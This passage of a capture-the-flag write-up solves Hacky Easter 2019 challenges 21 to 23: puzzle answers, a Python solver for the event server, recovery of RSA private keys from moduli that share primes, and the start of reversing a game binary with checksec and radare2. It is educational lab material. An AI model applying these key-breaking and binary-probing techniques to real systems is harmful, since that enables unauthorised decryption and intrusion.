Remember the variable <code>a<\/code> from the original source code?\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nlet a = &#x5B;&#039;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789&#039;];\n<\/pre><\/div>\n<br\/>\n<br\/>The output values are to be used as indices into the alphabet string in <code>a<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg21_22.png\" width=\"500\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-JfsM-ywiw-mSxE-yfYa<\/span>.\n<br\/>\n<h1 id=\"chlg22\">22 &#8211; The Hunt: Muddy Quagmire<\/h1>\nIn the same manner as described in <a href=\"#chlg21\">egg21<\/a>, I started by creating a map:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>Let&#8217;s have a look at the individual tasks:\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Old Rumpy<\/h3>\n<br\/>The very first task requires us to calculate some time offset:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>I did not automate this task, but solved it once manually and then reused the session cookie.\n<br\/>\n<br\/>In this case the time zone of <code>Mogadishu<\/code> is <code>GMT+3<\/code>, which makes the result <code>23:03<\/code>.\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Simon&#8217;s Eyes<\/h3>\n<br\/>The next task is quite simple:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_03.png\" width=\"700\"\/>\n<br\/>\n<br\/>We only have to enter the steps we made from the start of the maze until now.\n<br\/>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Mathonymous<\/h3>\n<br\/>The following task was also very easy to 
solve:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_04.png\" width=\"700\"\/>\n<br\/>\n<br\/>We only have to calculate the correct result. In this case <code>76*49+21-33 = 3712<\/code>. This could have also been easily automated using <code>eval<\/code>. Though, it is not necessary if we save the session cookie.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Randonacci<\/h3>\n<br\/>This task also contains a very specific hint:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_05.png\" width=\"700\"\/>\n<br\/>\n<br\/>Although the hint was very specific, it took me a while to understand that my solution was not working since I used <code>python2<\/code>. The pseudorandom number generator used in <code>python2<\/code> seems to differ from the one used in <code>python3<\/code>. This task requires us to use <code>python3<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/python3\n\nimport random\nrandom.seed(1337)\nfibo = &#x5B;1,1]\nfor i in range(150): fibo.append(fibo&#x5B;-1]+fibo&#x5B;-2])\nfor i in fibo: print(i % random.randint(1,i))\n\n<\/pre><\/div>\n<br\/>\n<br\/>At first we initialize the random seed with <code>1337<\/code>. 
After this we create a few <a href=\"https:\/\/en.wikipedia.org\/wiki\/Fibonacci_sequence\" target=\"_new\" rel=\"noopener noreferrer\">Fibonacci<\/a> numbers in order to calculate the actual sequence.\n<br\/>\n<br\/>By running the script and grepping for the last number of the sequence before the searched value, we can determine its value:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22\/c4# .\/randonacci.py | grep 33195859417603166742 -A1\n33195859417603166742\n117780214897213996119\n\n<\/pre><\/div>\n<br\/>\n<br\/>The solution is <code>117780214897213996119<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">C0tt0nt4il Ch3ck<\/h3>\n<br\/>For the next task, we have to know the c0tt0nt4il alphabet:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_06.png\" width=\"700\"\/>\n<br\/>\n<br\/>The c0tt0nt4il alphabet is simply a kind of <a href=\"https:\/\/en.wikipedia.org\/wiki\/Leet\" target=\"_new\" rel=\"noopener noreferrer\">leetspeak<\/a>. After a while I figured out that the green image with the yellow text (<code>bcd3f6h<\/code>) merely shows an excerpt of the c0tt0nt4il alphabet in alphabetic order. <code>3<\/code> is <code>e<\/code> and <code>6<\/code> is <code>g<\/code>, which makes this <code>bcdefgh<\/code>. We only have to submit the next letter, which would be <code>i<\/code> in this case. Though, <code>i<\/code> is actually replaced by <code>1<\/code>. In order to determine which letters are replaced by a number, we can simply rerun the task a few times and inspect the shown excerpt. 
The full c0tt0nt4il alphabet is <code>4bcd3f6h1jklmn0pqr5tuvwxyz<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Bun Bun&#8217;s Goods &#038; Gadgets<\/h3>\n<br\/>This task offers some goods and gadgets in <code>Bun Bun's shop<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_07.png\" width=\"500\"\/>\n<br\/>\n<br\/>The button beneath the text is linked to <code>http:\/\/whale.hacking-lab.com:5337\/?action=watch<\/code>.\n<br\/>\n<br\/>After clicking on it, we get a lot of redirects (<code>302<\/code>):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_08.png\" width=\"700\"\/>\n<br\/>\n<br\/>On each redirect another <code>Content-Type<\/code> is returned from the server. The different <code>Content-Type<\/code>s are the actual items of the shop.\n<br\/>\n<br\/>The last redirect leads us to the shop page again. This time there is a new <code>buy<\/code> button, which is linked to <code>http:\/\/whale.hacking-lab.com:5337\/?action=buy<\/code>.\n<br\/>\n<br\/>Clicking on this button gives us a <code>418 I'M A TEAPOT<\/code> status code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_09.png\" width=\"700\"\/>\n<br\/>\n<br\/>This is actually an <a href=\"https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Status\/418\" target=\"_new\" rel=\"noopener noreferrer\">HTTP status code<\/a> added as part of an April Fools&#8217; joke in 1998.\n<br\/>\n<br\/>The description of the task stated that we can buy one item for free. Considering the status code and all items available in the shop, we should definitely buy the <code>shop\/teabag<\/code>.\n<br\/>\n<br\/>In order to buy this item, we have to follow all redirects until we receive the <code>Content-Type: shop\/teabag<\/code>. 
Then we don&#8217;t have to follow the redirect, but visit the route <code>\/?action=buy<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\ndef solveChallenge7(s, resp):\n  r = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?action=watch&#039;, allow_redirects=False)\n  while (r.status_code == 302):\n    print(r.headers&#x5B;&#039;Content-Type&#039;])\n    if (r.headers&#x5B;&#039;Content-Type&#039;] == &#039;shop\/teabag&#039;):\n      s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/?action=buy&#039;)\n      resp = s.get(&#039;http:\/\/whale.hacking-lab.com:5337\/&#039;).text\n      if (&#039;One day I will be able to drink tea&#039; in resp): return True\n      return False\n    r = s.get(&#039;http:\/\/whale.hacking-lab.com:5337&#039;, allow_redirects=False)\n  return False\n\nif (solveChallenge7(s, resp)): print(&#039;solved c7!&#039;)\nelse:\n  print(&#039;failure solving c7!&#039;)\n  quit()\n<\/pre><\/div>\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Sailor John<\/h3>\n<br\/>This task requires some math:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_10.png\" width=\"700\"\/>\n<br\/>\n<br\/>There are two value pairs (<code>p1,c1<\/code> and <code>p2,c2<\/code>) for which we have to find a corresponding <code>x1\/x2<\/code> to fulfil the equation.\n<br\/>\n<br\/>Both <code>p1<\/code> and <code>p2<\/code> are actually primes:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_11.png\" width=\"500\"\/>\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_12.png\" width=\"500\"\/>\n<br\/>\n<br\/>An <a href=\"https:\/\/en.wikipedia.org\/wiki\/Emirp\" target=\"_new\" rel=\"noopener noreferrer\">emirp<\/a> is actually a prime number, which when spelled backwards, is another prime number. 
In this case there is no real emirp, we are only supposed to spell the given prime backwards. Thus the equation for the first value pair looks like this:\n<br\/>\n<br\/><code>reversed(p1) ^ x1 % p1 = c1<\/code>\n<br\/>\n<br\/><code>71140253671 ^ x1 % 17635204117 = 419785298<\/code>\n<br\/>\n<br\/>Actually this is not an easy equation to solve. Though I found <a href=\"https:\/\/www.alpertron.com.ar\/DILOG.HTM\" target=\"_new\" rel=\"noopener noreferrer\">this amazing page<\/a>, which solves the equation in seconds:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_13.png\" width=\"600\"\/>\n<br\/>\n<br\/>Accordingly the result for <code>x1<\/code> is <code>1647592057<\/code>.\n<br\/>\n<br\/>In the same manner we can calculate the result for <code>x2<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_14.png\" width=\"600\"\/>\n<br\/>\n<br\/>The value of <code>x2<\/code> is <code>305768189495<\/code>.\n<br\/>\n<br\/>At last we have to convert the numbers to ASCII characters:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; hex(1647592057)\n&#039;0x62344279&#039;\n&gt;&gt;&gt; &#039;62344279&#039;.decode(&#039;hex&#039;)\n&#039;b4By&#039;\n&gt;&gt;&gt; hex(305768189495)\n&#039;0x4731344e37&#039;\n&gt;&gt;&gt; &#039;4731344e37&#039;.decode(&#039;hex&#039;)\n&#039;G14N7&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>The secret is <code>b4ByG14N7<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">Ran-Dee&#8217;s Secret Algorithm<\/h3>\n<br\/>The second to last task is a RSA crypto challenge:\n<br\/>\n<br\/><img 
decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_15.png\" width=\"700\"\/>\n<br\/>\n<br\/>We have got the 6 values <code>n0<\/code>, <code>n1<\/code>, <code>n2<\/code>, <code>c1<\/code>, <code>c2<\/code> and <code>c3<\/code>.\n<br\/>\n<br\/>Let&#8217;s start with a short review of <a href=\"https:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\" target=\"_new\" rel=\"noopener noreferrer\">RSA<\/a>. <code>n<\/code> is the RSA modulus, which is calculated by multiplying two primes:\n<br\/>\n<br\/><code>n = p * q<\/code>\n<br\/>\n<br\/>As the task description states, the list of available primes was quite small. Its size is actually the smallest odd prime, which is <code>3<\/code>.\n<br\/>\n<br\/><code>c<\/code> is the cipher text, which is produced by raising the plain text (<code>m<\/code>) to the power of <code>e<\/code> (<code>e<\/code> is chosen beforehand and is usually equal to <code>65537<\/code>) modulo <code>n<\/code>:\n<br\/>\n<br\/><code>c = m**e % n<\/code>\n<br\/>\n<br\/>In order to be able to decrypt the message, we need to find the primes <code>p<\/code> and <code>q<\/code>. With those we can calculate the secret exponent <code>d<\/code>, which is used to decrypt a message:\n<br\/>\n<br\/><code>m = c**d % n<\/code>\n<br\/>\n<br\/>Simply factorizing <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code> is quite hard, since the values are very big. 
However, we know that there were only three primes involved, which means that <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code> must share these primes as factors.\n<br\/>\n<br\/>In order to reveal those primes, we can simply calculate the greatest common divisor (<code>gcd<\/code>) of each pair of <code>n0<\/code>, <code>n1<\/code> and <code>n2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg22# python\nPython 2.7.16 (default, Apr  6 2019, 01:42:57)\n&#x5B;GCC 8.3.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; import gmpy2\n&gt;&gt;&gt; n0=10603199174122839808738169357706062732533966731323858892743816728206914395320609331466...\n&gt;&gt;&gt; n1=56133586686716136655665103829944414072194320629988325233058401869707803703682716186831...\n&gt;&gt;&gt; n2=43197226819995414250880489055413585390503681019180594772781599842207471693041753129885...\n&gt;&gt;&gt; p0=gmpy2.gcd(n0,n1)\n&gt;&gt;&gt; p0\nmpz(1173821128899717744763168991586024137475923012574062580049287532012184965219319828285650431646942194944437493)\n&gt;&gt;&gt; p1=gmpy2.gcd(n0,n2)\n&gt;&gt;&gt; p1\nmpz(9033062119150775356115605417902072538098631081058159551678022048966520848600866260935959311606867286026034943)\n&gt;&gt;&gt; p2=gmpy2.gcd(n1,n2)\n&gt;&gt;&gt; p2\nmpz(4782124405899304514745349491894350894228449009067812460621545024973542842784947583120716593095450482771264061)\n<\/pre><\/div>\n<br\/>\n<br\/>These are the three primes <code>p0<\/code>, <code>p1<\/code> and <code>p2<\/code>.\n<br\/>\n<br\/>Now we know, for example, that <code>n0 = p0 * p1<\/code>. 
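The common-factor recovery above, carried through to a decrypted message on constructed toy primes (an added example, not the writeup's own code; the primes, message and function names are my own, the challenge's real values are not reproduced, and Python 3.8+ is assumed for `pow(e, -1, phi)`):

```python
#!/usr/bin/env python3
"""Recovering RSA private keys from moduli that share prime factors.

Added example, not the writeup's own code. The primes, moduli, message
and helper names below are constructed for illustration and are far too
small for real use; the challenge's actual values are not reproduced.
Python 3.8+ is assumed for pow(e, -1, phi).
"""
from math import gcd

E = 65537

# Constructed toy primes (assumption: only three primes, used in pairs).
P0 = 1000000007
P1 = 1000000009
P2 = 998244353


def make_moduli(p0, p1, p2):
    """Build three moduli from only three primes: each prime ends up in
    two moduli, which is exactly what makes the gcd shortcut work."""
    return p0 * p1, p0 * p2, p1 * p2


def recover_shared_primes(n0, n1, n2):
    """Return (p0, p1, p2) with n0 = p0*p1, n1 = p0*p2, n2 = p1*p2.

    Two moduli that share a prime have that prime as their gcd, so no
    factoring is needed. Raises ValueError when the moduli do not share
    a factor pairwise; the shortcut then simply does not apply."""
    p0 = gcd(n0, n1)
    p1 = gcd(n0, n2)
    p2 = gcd(n1, n2)
    if 1 in (p0, p1, p2):
        raise ValueError("moduli do not share a prime pairwise")
    if p0 * p1 != n0 or p0 * p2 != n1 or p1 * p2 != n2:
        raise ValueError("recovered factors do not reproduce the moduli")
    return p0, p1, p2


def private_exponent(p, q, e=E):
    """d = e^-1 mod phi(n), with phi(n) = (p-1)*(q-1)."""
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)


def encrypt(m, n, e=E):
    """c = m**e % n (textbook RSA without padding, as in the challenge)."""
    return pow(m, e, n)


def decrypt(c, p, q, e=E):
    """m = c**d % n using the recovered factors p and q."""
    return pow(c, private_exponent(p, q, e), p * q)


def ascii_to_int(s):
    """Big-endian integer encoding of an ASCII string."""
    return int.from_bytes(s.encode("ascii"), "big")


def int_to_ascii(x):
    """Inverse of ascii_to_int (the hex() / .decode('hex') step above)."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big").decode("ascii")


def recover_plaintext(n0, n1, n2, c0):
    """The whole manual procedure in one call: gcd the moduli, derive d0
    for n0 and decode the plaintext as ASCII."""
    p0, p1, _ = recover_shared_primes(n0, n1, n2)
    return int_to_ascii(decrypt(c0, p0, p1))


if __name__ == "__main__":
    n0, n1, n2 = make_moduli(P0, P1, P2)
    m = ascii_to_int("he19")          # constructed sample message, m < n0
    c0 = encrypt(m, n0)
    print("shared primes:", recover_shared_primes(n0, n1, n2))
    print("plaintext:", recover_plaintext(n0, n1, n2, c0))
```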
In order to calculate the secret exponent <code>d0<\/code>, we have to calculate the modular inverse of <code>e<\/code> modulo <code>phi(n0)<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; phi_n0 = (p0-1)*(p1-1)\n&gt;&gt;&gt; phi_n0\nmpz(10603199174122839808738169357706062732533966731323858892743816728206914395320609331466257631...)\n&gt;&gt;&gt; e=65537\n&gt;&gt;&gt; d0=gmpy2.invert(e,phi_n0)\n&gt;&gt;&gt; d0\nmpz(40588134592858947202620573824980086938840597431789927528306777890432406340755317804979478033...)\n\n<\/pre><\/div>\n<br\/>\n<br\/>Using <code>d0<\/code> we can finally decrypt the cipher text <code>c0<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n&gt;&gt;&gt; c0=88389551551870299015700839894517562236934817747927372766618...\n&gt;&gt;&gt; gmpy2.powmod(c0,d0,n0)\nmpz(516763741385810790760706298905075545750264045813156135838053)\n&gt;&gt;&gt; hex(516763741385810790760706298905075545750264045813156135838053)\n&#039;0x525341336e6372797074216f6e77216c6c6e65766572642165L&#039;\n&gt;&gt;&gt; &#039;525341336e6372797074216f6e77216c6c6e65766572642165&#039;.decode(&#039;hex&#039;)\n&#039;RSA3ncrypt!onw!llneverd!e&#039;\n<\/pre><\/div>\n<br\/>\n<br\/>The plain text is <code>RSA3ncrypt!onw!llneverd!e<\/code>.\n<br\/>\n<br\/><h3 style=\"margin-bottom:-5px\">A mysterious gate<\/h3>\n<br\/>After having solved all previous tasks, we can step up to the mysterious gate:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_16.png\" width=\"500\"\/>\n<br\/>\n<br\/>The gate requires us to enter 8 numbers. These numbers are used within the JavaScript code of the page in order to calculate the final flag. 
Though only if the result of the computation equals <code>-502491864<\/code>, the flag is actually correct and the gate is opened:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n...\n            function h(s) {\n                return s.split(&quot;&quot;).reduce(function (a, b) {\n                    a = ((a &lt;&lt; 5) - a) + b.charCodeAt(0);\n                    return a &amp; a\n                }, 0);\n            }\n\n            var ca = function (str, amount) {\n                if (Number(amount) &lt; 0)\n                    return ca(str, Number(amount) + 26);\n                var output = &#039;&#039;;\n                for (var i = 0; i &lt; str.length; i++) {\n                    var c = str&#x5B;i];\n                    if (c.match(\/&#x5B;a-z]\/i)) {\n                        var code = str.charCodeAt(i);\n                        if ((code &gt;= 65) &amp;&amp; (code &lt;= 90))\n                            c = String.fromCharCode(((code - 65 + Number(amount)) % 26) + 65);\n                        else if ((code &gt;= 97) &amp;&amp; (code &lt;= 122))\n                            c = String.fromCharCode(((code - 97 + Number(amount)) % 26) + 97);\n                    }\n                    output += c;\n                }\n                return output;\n\n            };\n\n            $(&#039;.door&#039;).click(function () {\n                var n = &#x5B;\n                    $(&#039;#n1&#039;).val(),\n                    $(&#039;#n2&#039;).val(),\n                    $(&#039;#n3&#039;).val(),\n                    $(&#039;#n4&#039;).val(),\n                    $(&#039;#n5&#039;).val(),\n                    $(&#039;#n6&#039;).val(),\n                    $(&#039;#n7&#039;).val(),\n                    $(&#039;#n8&#039;).val()\n                ];\n\n                var g = &#039;Um&#039;;\n                var et = &#039;iT&#039;;\n                var lo = &#039;BG&#039;;\n   
             var st = &#039;4I&#039;;\n\n                var into = &#039;xr&#039;;\n                var the = &#039;Xp&#039;;\n                var lab = &#039;rr&#039;;\n                var hahaha = &#039;Qv&#039;;\n\n                var ok = ca(&#039;mj19&#039;, -5) + &#039;&lt;br&gt;&#039; +\n                    ca(et, n&#x5B;0]) +\n                    ca(the, n&#x5B;1]) + &#039;&lt;br&gt;&#039; +\n                    ca(g, n&#x5B;2]) +\n                    ca(lo, n&#x5B;3]) + &#039;&lt;br&gt;&#039; +\n                    ca(st, n&#x5B;4]) +\n                    ca(hahaha, n&#x5B;5]) + &#039;&lt;br&gt;&#039; +\n                    ca(into, n&#x5B;6]) +\n                    ca(lab, n&#x5B;7]);\n\n                $(&#039;#key&#039;).html(ok);\n\n                if (h(n.join(&#039;&#039;)) === -502491864) {\n                    $(&#039;.door&#039;).toggleClass(&#039;what&#039;);\n                }\n            });\n<\/pre><\/div>\n<br\/>\n<br\/>According to the quite small input fields, I hoped that the values are not very big and wrote a quick bruteforcer in javascript. 
Well, it worked out directly:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_17.png\" width=\"500\"\/>\n<br\/>\n<br\/>I was quite lucky with the chosen parameters for the loops (especially the <code>-9<\/code> on the outer loop).\n<br\/>\n<br\/>Finally entering the numbers in the input fields opens the gate:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg22_18.png\" width=\"500\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-zKZr-YqJO-4OWb-auss<\/span>.\n<br\/>\n<h1 id=\"chlg23\">23 &#8211; The Maze<\/h1>\nThe challenge description provides a binary called <code>maze<\/code> as well as an ip address and port of a server, which is running the binary:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# file maze\nmaze: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.0.0, BuildID&#x5B;sha1]=1a30ee698ef00862581bf5256a0d2ac6764c02d5, stripped\n\n<\/pre><\/div><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# nc whale.hacking-lab.com 7331\n...\n\nYour position:\n\n\n\n\n\n   +-----+-----+\n               |\n            X  |\n               |\n   +-----+-----+\n\n\n\n\n\n\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>We can navigate through the maze by entering <code>go &lt;direction&gt;<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt; go west\nYour position:\n\n\n\n\n\n   +-----+-----+-----+\n   |                 |\n   |        X        |\n   |                 |\n   +     +-----+-----+\n   |     |\n   |     |\n   |     
|\n   +     +\n\n\n\n\nEnter your command:\n&gt;\n<\/pre><\/div>\n<br\/>We can also search for items by entering <code>search<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&gt; search\nYour position:\n\n\n\n\n\n   +-----+-----+-----+\n   |                 |\n   |        X        |\n   |                 |\n   +     +-----+-----+\n   |     |\n   |     |\n   |     |\n   +     +\n\nThere is nothing interesting here.\n\n\nEnter your command:\n&gt; \n<\/pre><\/div>\n<br\/>Let&#8217;s have a look at the binary using <code>checksec<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# checksec maze\n&#x5B;*] &#039;\/root\/Documents\/he19\/egg23\/maze&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x400000)\n<\/pre><\/div>\n<br\/>The binary is compiled without stack canaries and position independent code (<i>PIE<\/i>). <i>NX<\/i> is enabled, though.\n<br\/>\n<br\/>We can further inspect the binary using <code>radare2<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg23# r2 -A maze\n&#x5B;x] Analyze all flags starting with sym. 
and entry0 (aa)\n&#x5B;x] Analyze function calls (aac)\n&#x5B;x] Analyze len bytes of instructions for references (aar)\n&#x5B;x] Constructing a function name for fcn.* and sym.func.* functions (aan)\n&#x5B;x] Type matching analysis for all functions (afta)\n&#x5B;x] Use -AA or aaaa to perform additional experimental analysis.\n&#x5B;0x00400a60]&gt;\n<\/pre><\/div>\n<br\/>&#8230; and start by listing all strings with the command <code>iz<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; iz\n&#x5B;Strings]\nNum Paddr      Vaddr      Len Size Section  Type  String\n000 0x00002048 0x00402048  34  35 (.rodata) ascii There is nothing interesting here.\n001 0x0000206b 0x0040206b  23  24 (.rodata) ascii You found a rusty nail.\n002 0x00002088 0x00402088  37  38 (.rodata) ascii You found an arrow stuck in the wall.\n003 0x000020b0 0x004020b0  77  78 (.rodata) ascii You found a map, but unfortunately someone else has already torn out a piece.\n...\n037 0x000023b0 0x004023b0  16  17 (.rodata) ascii You found a key!\n038 0x000023c1 0x004023c1  25  26 (.rodata) ascii You found a locked chest!\n039 0x000023db 0x004023db   9  10 (.rodata) ascii 2+!)b72HB\n040 0x000023e5 0x004023e5  29  30 (.rodata) ascii Maybe you should search first\n041 0x00002403 0x00402403  23  24 (.rodata) ascii You pick up the key: %s\n042 0x00002420 0x00402420  41  42 (.rodata) ascii This is to heavy! You can&#039;t pick up that.\n043 0x00002450 0x00402450  37  38 (.rodata) ascii There is nothing you want to pick up!\n044 0x00002476 0x00402476   6   7 (.rodata) ascii -2&#039;,HB\n045 0x00002480 0x00402480  45  46 (.rodata) ascii The chest is locked. Please enter the key:\\n&gt;\n046 0x000024b0 0x004024b0  33  34 (.rodata) ascii Sorry but that was the wrong key.\n047 0x000024d8 0x004024d8  57  58 (.rodata) ascii Congratulation, you solved the maze. 
Here is your reward:\n048 0x00002514 0x00402514   7   8 (.rodata) ascii egg.txt\n\n<\/pre><\/div>\n<br\/>Obviously there seems to be a key, which we can find, as well as a locked chest, which requires this key to be entered.\n<br\/>\n<br\/>By using the <code>axt<\/code> command we can determine where the string <code>\"Congratulation, ...\"<\/code> is used:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; axt @ str.Congratulation__you_solved_the_maze._Here_is_your_reward:\n(nofunc) 0x401cc9 &#x5B;DATA] mov edi, str.Congratulation__you_solved_the_maze._Here_is_your_reward:\n\n<\/pre><\/div>\n<br\/>The address of the string is moved to <code>edi<\/code> at <code>0x401cc9<\/code>. Since radare does not recognize any function around this address, we can simply print the next 30 instructions by using the command <code>pd<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [1,2,3,8,9,14,15,17,21,22,23]; title: ; notranslate\" title=\"\">\n&#x5B;0x00400a60]&gt; pd 30 @ 0x401cc9\n            0x00401cc9      bfd8244000     mov edi, str.Congratulation__you_solved_the_maze._Here_is_your_reward: ; 0x4024d8 ; &quot;Congratulation, you solved the maze. 
Here is your reward:&quot;\n            0x00401cce      e85decffff     call sym.imp.puts\n            0x00401cd3      bf00040000     mov edi, 0x400              ; 1024\n            0x00401cd8      e803edffff     call sym.imp.malloc\n            0x00401cdd      488945e8       mov qword &#x5B;rbp - 0x18], rax\n            0x00401ce1      be12254000     mov esi, 0x402512\n            0x00401ce6      bf14254000     mov edi, str.egg.txt        ; 0x402514 ; &quot;egg.txt&quot;\n            0x00401ceb      e810edffff     call sym.imp.fopen\n            0x00401cf0      488945e0       mov qword &#x5B;rbp - 0x20], rax\n        ,=&lt; 0x00401cf4      eb16           jmp 0x401d0c\n        |   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x706)\n       .--&gt; 0x00401cf6      488b45e8       mov rax, qword &#x5B;rbp - 0x18]\n       :|   0x00401cfa      4889c6         mov rsi, rax\n       :|   0x00401cfd      bf1c254000     mov edi, 0x40251c\n       :|   0x00401d02      b800000000     mov eax, 0\n       :|   0x00401d07      e864ecffff     call sym.imp.printf\n       :|   ; CODE XREF from sub.e_0_0HYour_position:_61e (+0x6d6)\n       :`-&gt; 0x00401d0c      488b55e0       mov rdx, qword &#x5B;rbp - 0x20]\n       :    0x00401d10      488b45e8       mov rax, qword &#x5B;rbp - 0x18]\n       :    0x00401d14      be00040000     mov esi, 0x400              ; 1024\n       :    0x00401d19      4889c7         mov rdi, rax\n       :    0x00401d1c      e89fecffff     call sym.imp.fgets\n       :    0x00401d21      4885c0         test rax, rax\n       `==&lt; 0x00401d24      75d0           jne 0x401cf6\n            0x00401d26      488b45e0       mov 